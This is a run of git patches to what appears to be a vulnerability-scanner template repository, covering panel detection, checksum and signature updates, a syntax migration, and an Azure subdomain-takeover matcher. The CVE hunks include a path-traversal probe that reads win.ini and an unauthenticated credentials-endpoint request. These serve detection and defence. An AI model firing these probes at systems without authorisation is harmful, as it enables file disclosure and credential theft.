"{{BaseURL}}/favicon.ico" - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: - type: word part: body words: - - 'Login | umami' + - 'Login | umami' + - 'umami' + condition: or + case-insensitive: true - - type: status - status: - - 200 + - type: dsl + dsl: + - "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))" From cc000e9cdcd563a251701858017ae0f59e803102 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 10 May 2024 08:53:27 +0000 Subject: [PATCH 046/375] Auto Generated New Template Addition List [Fri May 10 08:53:27 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d241aa85b6..ed15c7d37d 100644 --- a/.new-additions +++ b/.new-additions @@ -51,6 +51,7 @@ http/exposed-panels/monitorr-panel.yaml http/exposed-panels/openwebui-panel.yaml http/exposed-panels/teamforge-panel.yaml http/exposed-panels/tixeo-panel.yaml +http/exposed-panels/umami-panel.yaml http/misconfiguration/installer/eyoucms-installer.yaml http/misconfiguration/installer/sabnzbd-installer.yaml http/misconfiguration/microsoft/ms-exchange-local-domain.yaml From d147e83706661c1847bf6a914787cd5a29d7ad61 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 08:53:36 +0000 Subject: [PATCH 047/375] Auto Generated Templates Checksum [Fri May 10 08:53:36 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1dc13e232b..b6ce096abf 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4438,6 +4438,7 @@ http/exposed-panels/turnkey-openvpn.yaml:39c452eb93078b6a3c5c3b7f7789fba65fb9dbf http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 http/exposed-panels/typo3-login.yaml:72cfd4ea09b641aada781d8217ae54a23b88a0cd http/exposed-panels/uipath-orchestrator-panel.yaml:af4705f7f98e419ceddff8130581d58ce6028339 +http/exposed-panels/umami-panel.yaml:18b222a00025be7c5fc48af062e14c96107cba85 http/exposed-panels/umbraco-login.yaml:fdfd46a20aa2721ffa8784101d3b1b69f2393ea7 http/exposed-panels/unauth/tautulli-unauth.yaml:091217f1b5773c345e63401e05aa540485af4672 http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656cb6081b84a @@ -8395,7 +8396,7 @@ network/detection/totemomail-smtp-detect.yaml:fef66d409db7afc6efd33ddcae751cd3a7 network/detection/vmware-authentication-daemon-detect.yaml:fe32f8021fd370465c0f97fff15ea59eb34e42fd network/detection/vnc-service-detect.yaml:22f648aa53fa7fb08f258bcd06fa4b15d80eebca network/detection/weblogic-iiop-detect.yaml:05bf3f6fdfa938cfb88ee0e5f27da5e1b8d70bfa -network/detection/weblogic-t3-detect.yaml:d3dc1f10137723bfd082bce409d2bf11ab1cbcc5 +network/detection/weblogic-t3-detect.yaml:d9f9d79b5176d8eb2abd9bf4de3ce84a0220fd99 network/detection/wing-ftp-detect.yaml:79fe3254d4657278f122977cda7145287f7b993c network/detection/ws_ftp-ssh-detect.yaml:558ac2fd876a7239ddfd7c5c9433769f166644bd network/detection/xlight-ftp-service-detect.yaml:c1bcbafb4cd2ad7a5b4b6c7b947779ee08367781 @@ -8498,7 +8499,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7fe510f2b3d443f5dfc758fdda968aa2cd19f6f2 +templates-checksum.txt:55ebadcb226869a8c75f50d00edb88bbb83f9742 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 31a6972fe78d2bf21f58e1465fc8dc5bd54c7a8a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 10 May 2024 08:54:07 +0000 Subject: [PATCH 048/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3875340387..11e44b532c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -56,6 +56,7 @@ on: - 'http/exposed-panels/openwebui-panel.yaml' - 'http/exposed-panels/teamforge-panel.yaml' - 'http/exposed-panels/tixeo-panel.yaml' + - 'http/exposed-panels/umami-panel.yaml' - 'http/misconfiguration/installer/eyoucms-installer.yaml' - 'http/misconfiguration/installer/sabnzbd-installer.yaml' - 'http/misconfiguration/microsoft/ms-exchange-local-domain.yaml' From 3368997d0e264a7fb4d18556dc8c0ef87ef96d9f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 08:55:17 +0000 Subject: [PATCH 049/375] Auto Template Signing [Fri May 10 08:55:16 UTC 2024] :robot: --- http/exposed-panels/umami-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index d26a8a8a86..0384dd6d83 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -30,3 +30,4 @@ http: - type: dsl dsl: - "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))" +# digest: 4a0a004730450220172b896da3d6bd42b77029a5548cba1ea8a4852ecadc712d6e3f2a7d6b35dcfd022100886497be5d4a19d2cb6c879e61fbb41280e2c9be3e88233da54f4e621a9a4739:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5c6e2df3c8e6688664d1c08648f66b4479f6377b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 09:03:07 +0000 Subject: [PATCH 051/375] Auto Generated Templates Checksum [Fri May 10 09:03:07 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b6ce096abf..794f742137 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4438,7 +4438,7 @@ http/exposed-panels/turnkey-openvpn.yaml:39c452eb93078b6a3c5c3b7f7789fba65fb9dbf http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 http/exposed-panels/typo3-login.yaml:72cfd4ea09b641aada781d8217ae54a23b88a0cd http/exposed-panels/uipath-orchestrator-panel.yaml:af4705f7f98e419ceddff8130581d58ce6028339 -http/exposed-panels/umami-panel.yaml:18b222a00025be7c5fc48af062e14c96107cba85 +http/exposed-panels/umami-panel.yaml:afab83e5265cf3d604e9153445924e90e87483de http/exposed-panels/umbraco-login.yaml:fdfd46a20aa2721ffa8784101d3b1b69f2393ea7 http/exposed-panels/unauth/tautulli-unauth.yaml:091217f1b5773c345e63401e05aa540485af4672 http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656cb6081b84a @@ -5342,7 +5342,7 @@ http/misconfiguration/hp/unauthorized-hp-printer.yaml:960dd267c9ce3fe43452ea0d5e http/misconfiguration/hp/unauthorized-printer-hp.yaml:69f3ee3a5ae28923c962d7e2b23a0deb5e824611 http/misconfiguration/hpe-system-management-anonymous.yaml:82910902ebfef5f84f465fa13c5dcbd83572426a http/misconfiguration/http-missing-security-headers.yaml:62e00bd5126dbd778c766aa3bb0bd1f2fc546006 -http/misconfiguration/https-to-http-redirect.yaml:9c60308f5bfe2dfc11ff9e1682bf68d0b204b3f5 +http/misconfiguration/https-to-http-redirect.yaml:a05bd46e0de9832515105802a679ed46f6af687b http/misconfiguration/ibm-friendly-path-exposure.yaml:77e6c72a9cae1a9b0a6afd79b159b08db996e463 http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb77fd1 http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421 @@ -6683,7 +6683,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:20226a4707ea3e5d8e45845ff2ab3a2069fde0ff +http/technologies/favicon-detect.yaml:add7609902cf4ff52e54789877b8860c4f4c6afe http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 @@ -8499,7 +8499,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:55ebadcb226869a8c75f50d00edb88bbb83f9742 +templates-checksum.txt:e8c5c4d64ae270c6b4d3f298c40eb7b95600371e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From fc57c4d125e895f380a005a34c7f8b8bacffabc0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 09:04:51 +0000 Subject: [PATCH 052/375] Auto Template Signing [Fri May 10 09:04:51 UTC 2024] :robot: --- http/misconfiguration/https-to-http-redirect.yaml | 2 +- http/technologies/favicon-detect.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/https-to-http-redirect.yaml b/http/misconfiguration/https-to-http-redirect.yaml index b3ff8b6c71..5419f82670 100644 --- a/http/misconfiguration/https-to-http-redirect.yaml +++ b/http/misconfiguration/https-to-http-redirect.yaml @@ -31,4 +31,4 @@ http: - 'status_code == 200' - 'contains(tolower(body), " Date: Fri, 10 May 2024 15:47:47 +0530 Subject: [PATCH 053/375] deprecated protocol syntax --- http/cves/2024/CVE-2024-31621.yaml | 2 +- http/cves/2024/CVE-2024-32399.yaml | 2 +- http/exposed-panels/cassia-bluetooth-gateway-panel.yaml | 2 +- http/misconfiguration/titannit-web-exposure.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-31621.yaml b/http/cves/2024/CVE-2024-31621.yaml index 7df09d52bf..17cd51304b 100644 --- a/http/cves/2024/CVE-2024-31621.yaml +++ b/http/cves/2024/CVE-2024-31621.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.favicon.hash:-2051052918 tags: cve,cve2024,auth-bypass,flowise -requests: +http: - method: GET path: - "{{BaseURL}}/API/V1/credentials" diff --git a/http/cves/2024/CVE-2024-32399.yaml b/http/cves/2024/CVE-2024-32399.yaml index 76689ee791..5576e36737 100644 --- a/http/cves/2024/CVE-2024-32399.yaml +++ b/http/cves/2024/CVE-2024-32399.yaml @@ -21,7 +21,7 @@ info: shodan-query: html:"RaidenMAILD" tags: cve,cve2024,lfi,raiden,mail,server -requests: +http: - method: GET path: - "{{BaseURL}}/webeditor/../../../windows/win.ini" diff --git a/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml b/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml index 2ff8cdd3ef..dfd60debbb 100644 --- a/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml +++ b/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml @@ -14,7 +14,7 @@ info: shodan-query: html:"Cassia Bluetooth Gateway Management Platform" tags: cassia,gateway,login,panel -requests: +http: - method: GET path: - "{{BaseURL}}/cassia/login" diff --git a/http/misconfiguration/titannit-web-exposure.yaml b/http/misconfiguration/titannit-web-exposure.yaml index 8820107c4c..8abc2f4016 100644 --- a/http/misconfiguration/titannit-web-exposure.yaml +++ b/http/misconfiguration/titannit-web-exposure.yaml @@ -10,7 +10,7 @@ info: shodan-query: title:"TitanNit Web Control" tags: misconfig,titannit,webcontrol,exposure -requests: +http: - method: GET path: - "{{BaseURL}}" From b5998cbf9ee2ecbc925111167b7472f847541bca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 10:23:07 +0000 Subject: [PATCH 055/375] Auto Generated Templates Checksum [Fri May 10 10:23:07 UTC 2024] :robot: --- templates-checksum.txt | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 794f742137..b46a6a2fef 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3273,12 +3273,12 @@ http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d -http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 +http/cves/2024/CVE-2024-31621.yaml:a8be34655c70d85af9a56ca6f57228c1c0cd0b78 http/cves/2024/CVE-2024-31848.yaml:0d6172ae416d3a1de4e4cabcccdb4e102f2ca440 http/cves/2024/CVE-2024-31849.yaml:38ee32ca8fe1a5378feb218852477eb6460e62ea http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf -http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 +http/cves/2024/CVE-2024-32399.yaml:73046107ec5e2333ffbfbc9048afe6d20f6401ac http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5 http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 @@ -3627,7 +3627,7 @@ http/exposed-panels/cas-login.yaml:5306b5f25ec74fe5de0dfaeb4553db4cf0573e71 http/exposed-panels/casaos-panel.yaml:b5b35a1e107699546e8e9f9e743458550dcf48f2 http/exposed-panels/casdoor-login.yaml:fad04f2809901a34b0e399199f2435442f1084c5 http/exposed-panels/casemanager-panel.yaml:d3f500a3a04229668da9d25eff8008549cef7184 -http/exposed-panels/cassia-bluetooth-gateway-panel.yaml:1decbcfd31237f785c6a156d79e8db4a25cb2d14 +http/exposed-panels/cassia-bluetooth-gateway-panel.yaml:eb3de9785c4ec199f308428c8f25e37d43d94b93 http/exposed-panels/caton-network-manager-system.yaml:a090f70d917315acdb3413100357b0d3c0d218d8 http/exposed-panels/ccm-detect.yaml:c516a91f314390b740ba2d8ea6c94057b54aec56 http/exposed-panels/centreon-panel.yaml:b04f3b6e8b7ed6fab27a4a623a6616b90d950023 @@ -5342,7 +5342,7 @@ http/misconfiguration/hp/unauthorized-hp-printer.yaml:960dd267c9ce3fe43452ea0d5e http/misconfiguration/hp/unauthorized-printer-hp.yaml:69f3ee3a5ae28923c962d7e2b23a0deb5e824611 http/misconfiguration/hpe-system-management-anonymous.yaml:82910902ebfef5f84f465fa13c5dcbd83572426a http/misconfiguration/http-missing-security-headers.yaml:62e00bd5126dbd778c766aa3bb0bd1f2fc546006 -http/misconfiguration/https-to-http-redirect.yaml:a05bd46e0de9832515105802a679ed46f6af687b +http/misconfiguration/https-to-http-redirect.yaml:cccf8e9ceb416d8e224b314e9952d676e592c00e http/misconfiguration/ibm-friendly-path-exposure.yaml:77e6c72a9cae1a9b0a6afd79b159b08db996e463 http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb77fd1 http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421 @@ -5655,7 +5655,7 @@ http/misconfiguration/teslamate-unauth-access.yaml:446a2240cd1f6c0de4961e997f7e0 http/misconfiguration/thanos-prometheus-exposure.yaml:d238fc8c96c28626700eb47c6949a5420988bbf5 http/misconfiguration/thinkphp-errors.yaml:f3ddd674ae9e75b7760f111edf8347d3babb994e http/misconfiguration/tiny-file-manager-unauth.yaml:022c4efede57b4b63e9e54ea86fc05b756100d69 -http/misconfiguration/titannit-web-exposure.yaml:7a171e9165d8f1a7467e018c320247c2eba80b9c +http/misconfiguration/titannit-web-exposure.yaml:ca61b80c8d10fe5c8b27923a98bddddb9461c842 http/misconfiguration/tls-sni-proxy.yaml:a2c22f5e9d5b37efd159f4985d09700912cc59ed http/misconfiguration/tomcat-cookie-exposed.yaml:3b3d6328a22661f3aa85b86e5c9f49c5eff9e5c6 http/misconfiguration/tomcat-scripts.yaml:140d28fb99d8811e144b9cab5bf574697bcdf4de @@ -6683,7 +6683,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:add7609902cf4ff52e54789877b8860c4f4c6afe +http/technologies/favicon-detect.yaml:43e1210c06cedc5762c38b9ed9690d21e0d01527 http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 @@ -8499,7 +8499,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e8c5c4d64ae270c6b4d3f298c40eb7b95600371e +templates-checksum.txt:07fe2e75905885b44a32ce84cd835eb6768bd265 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 19e9bdc1a5f8d2dcf52091e713d1a8c87da45c7f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 10:24:47 +0000 Subject: [PATCH 056/375] Auto Template Signing [Fri May 10 10:24:47 UTC 2024] :robot: --- http/cves/2024/CVE-2024-31621.yaml | 2 +- http/cves/2024/CVE-2024-32399.yaml | 2 +- http/exposed-panels/cassia-bluetooth-gateway-panel.yaml | 2 +- http/misconfiguration/titannit-web-exposure.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-31621.yaml b/http/cves/2024/CVE-2024-31621.yaml index 17cd51304b..6adada63e3 100644 --- a/http/cves/2024/CVE-2024-31621.yaml +++ b/http/cves/2024/CVE-2024-31621.yaml @@ -33,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220155c2cf39c87f683e27013b8a5c62149ad330e29ba1cceaae4f2cf68c444c7fd022100bee7c37ed60defbdc183d24164dbb70fbb12ba6031a1393aae635c3eb7f3ef8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d9304152d30fa5644b18033462ab1ed52f23ce5c4a695a6a8aebb824ca3ea457022100e6b1c27bfc23808cc83a3cad56e4e7796d3483c7fb35c8253aaddad5a1aac110:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32399.yaml b/http/cves/2024/CVE-2024-32399.yaml index 5576e36737..bdfa872f02 100644 --- a/http/cves/2024/CVE-2024-32399.yaml +++ b/http/cves/2024/CVE-2024-32399.yaml @@ -33,4 +33,4 @@ http: - 'contains(header, "application/octet-stream")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100b21edb32b4116b053ec5df064a8c2211cf7a2b9e6293731a8d9f4be377924cef0220379f8f6282665245242f29e33af2608658f85a062be362c3d0ba849564b85059:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c68ae449c313523a338ad0b181aaa41e15eda98a9b200d3ed208a44ae24127a6022100e2c5a881638a9019355b8922941feb90086ba1dfe4d8175bfd566c3122caf772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml b/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml index dfd60debbb..8b46061d8a 100644 --- a/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml +++ b/http/exposed-panels/cassia-bluetooth-gateway-panel.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100baabf488454e8584e30f25c730d6c8205a81001f9ce8402e9a0030146d3c7717022100dfdcbb0e792557b52b82af06286c1d278b9992528c519460c660113c0a6fa643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c69b6c8548d94d08177c560687c5ec6af029a7511c5c523f616cf8f15844d4c022049e60a52750b8da203076f14e8fc0a4389656a8d09dea222c577ee04de8a08af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/titannit-web-exposure.yaml b/http/misconfiguration/titannit-web-exposure.yaml index 8abc2f4016..8835426e75 100644 --- a/http/misconfiguration/titannit-web-exposure.yaml +++ b/http/misconfiguration/titannit-web-exposure.yaml @@ -27,4 +27,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008000902f0dd80d44d24d0aaa51dc88fb8ca6ea57bdbade552e272b651c9a0e2e02207dbc82cdb7f044cb3ec30f67daee04ba1b293f307cdf6a51b723b7d1720fed34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022077208e0ba5999cbde1529675b00c4aef08f25d22e17a7e32c879f55fc08d959d022009302237c4976cf4ac3b3178a0e47031e8775526bf381a67ce375519524ac681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 198217504d5e23b7c34d2f5a5ad4835f5e6a7fc1 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Fri, 10 May 2024 05:34:53 -0500 Subject: [PATCH 057/375] Update azure-takeover-detection.yaml Is better to check for the CNAME values instead of words in the response. A lot of false positives appear if they contain on of the terms to match, example: azurewebsites.net.reddog.microsoft.com --- dns/azure-takeover-detection.yaml | 50 ++++++++++++++----------------- 1 file changed, 23 insertions(+), 27 deletions(-) diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index c7c350400a..fdddd8cff0 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -4,7 +4,7 @@ info: name: Microsoft Azure Takeover Detection author: pdteam severity: high - description: Microsoft Azure is vulnerable to subdomain takeover attacks. Subdomain takeovers are a common, high-severity threat for organizations that regularly create and delete many resources. A subdomain takeover can occur when a DNS record points to a deprovisioned Azure resource. + description: Microsoft Azure is vulnerable to subdomain takeover attacks. Subdomain takeovers are a common, high-severity threat for organizations that regularly create and delete many resources. A subdomain takeover can occur when a D> reference: - https://godiego.co/posts/STO/ - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover @@ -25,33 +25,29 @@ dns: matchers: - type: word words: - - "azure-api.net" - - "azure-mobile.net" - - "azurecontainer.io" - - "azurecr.io" - - "azuredatalakestore.net" - - "azureedge.net" - - "azurefd.net" - - "azurehdinsight.net" - - "azurewebsites.net" - - "azurewebsites.windows.net" - - "blob.core.windows.net" - - "cloudapp.azure.com" - - "cloudapp.net" - - "database.windows.net" - - "redis.cache.windows.net" - - "search.windows.net" - - "servicebus.windows.net" - - "trafficmanager.net" - - "visualstudio.com" - - - type: word - words: - - "NXDOMAIN" - + - NXDOMAIN + - type: dsl + dsl: + - 'contains(cname, "azure-api.net")' + - 'contains(cname, "azure-mobile.net")' + - 'contains(cname, "azurecontainer.io")' + - 'contains(cname, "azurecr.io")' + - 'contains(cname, "azuredatalakestore.net")' + - 'contains(cname, "azureedge.net")' + - 'contains(cname, "azurefd.net")' + - 'contains(cname, "azurehdinsight.net")' + - 'contains(cname, "azurewebsites.net")' + - 'contains(cname, "azurewebsites.windows.net")' + - 'contains(cname, "blob.core.windows.net")' + - 'contains(cname, "cloudapp.azure.com")' + - 'contains(cname, "cloudapp.net")' + - 'contains(cname, "database.windows.net")' + - 'contains(cname, "redis.cache.windows.net")' + - 'contains(cname, "search.windows.net")' + - 'contains(cname, "servicebus.windows.net")' + - 'contains(cname, "trafficmanager.net")' + - 'contains(cname, "visualstudio.com")' extractors: - type: dsl dsl: - cname - -# digest: 4a0a00473045022043d1113417de308936591aa35f8175c25ad9d5b66b6d076fe0ba324450b1799e022100add5bb113b494d920eb39a99c107f2e7dff1979d482302e2580ff07e5857d9ff:922c64590222798bb761d5b6d8e72950 From ffae3db2eb7be08674c708961e383a6bb070f73b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 10 May 2024 10:59:30 +0000 Subject: [PATCH 058/375] Auto Generated Templates Stats [Fri May 10 10:59:30 UTC 2024] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 10608 +++++++++++++++++++++-------------------- TOP-10.md | 18 +- 3 files changed, 5332 insertions(+), 5296 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 07524d5b8e..8da832e644 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":2435},{"name":"panel","count":1123},{"name":"wordpress","count":962},{"name":"exposure","count":901},{"name":"xss","count":895},{"name":"wp-plugin","count":837},{"name":"osint","count":804},{"name":"tech","count":674},{"name":"lfi","count":647},{"name":"misconfig","count":602},{"name":"edb","count":599},{"name":"rce","count":586},{"name":"packetstorm","count":528},{"name":"cve2021","count":491},{"name":"wpscan","count":487},{"name":"cve2022","count":476},{"name":"wp","count":411},{"name":"unauth","count":361},{"name":"cve2023","count":347},{"name":"file","count":346},{"name":"sqli","count":344},{"name":"authenticated","count":341},{"name":"intrusive","count":297},{"name":"kev","count":271},{"name":"cve2020","count":257},{"name":"login","count":250},{"name":"detect","count":249},{"name":"token-spray","count":243},{"name":"config","count":220},{"name":"oast","count":219},{"name":"top-200","count":215},{"name":"osint-social","count":210},{"name":"default-login","count":209},{"name":"token","count":193},{"name":"","count":191},{"name":"network","count":191},{"name":"apache","count":188},{"name":"devops","count":176},{"name":"cve2018","count":169},{"name":"iot","count":166},{"name":"cve2019","count":164},{"name":"keys","count":155},{"name":"joomla","count":148},{"name":"malware","count":142},{"name":"redirect","count":134},{"name":"aws","count":133},{"name":"cloud","count":132},{"name":"auth-bypass","count":127},{"name":"ssrf","count":118},{"name":"phishing","count":117},{"name":"amazon","count":116},{"name":"files","count":113},{"name":"cve2010","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"cms","count":108},{"name":"install","count":106},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":89},{"name":"disclosure","count":88},{"name":"linux","count":83},{"name":"code","count":81},{"name":"local","count":80},{"name":"seclists","count":79},{"name":"privesc","count":79},{"name":"takeover","count":78},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":70},{"name":"oss","count":67},{"name":"cisco","count":66},{"name":"adobe","count":62},{"name":"js","count":62},{"name":"ir","count":61},{"name":"huntr","count":59},{"name":"cve2015","count":58},{"name":"cve2016","count":57},{"name":"atlassian","count":57},{"name":"vmware","count":56},{"name":"google","count":56},{"name":"c2","count":55},{"name":"enum","count":55},{"name":"logs","count":48},{"name":"tenable","count":48},{"name":"log4j","count":47},{"name":"vulhub","count":46},{"name":"hackerone","count":46},{"name":"osint-gaming","count":45},{"name":"aem","count":45},{"name":"php","count":44},{"name":"debug","count":44},{"name":"cve2014","count":44},{"name":"jndi","count":44},{"name":"deserialization","count":43},{"name":"osint-hobby","count":42},{"name":"plugin","count":42},{"name":"traversal","count":42},{"name":"cve2024","count":42},{"name":"osint-porn","count":42},{"name":"generic","count":42},{"name":"oa","count":42},{"name":"springboot","count":41},{"name":"microsoft","count":39},{"name":"misc","count":39},{"name":"cnvd","count":39},{"name":"injection","count":38},{"name":"listing","count":37},{"name":"kubernetes","count":37},{"name":"jira","count":37},{"name":"ibm","count":36},{"name":"cti","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"ssl","count":33},{"name":"fuzz","count":33},{"name":"miscellaneous","count":32},{"name":"osint-tech","count":31},{"n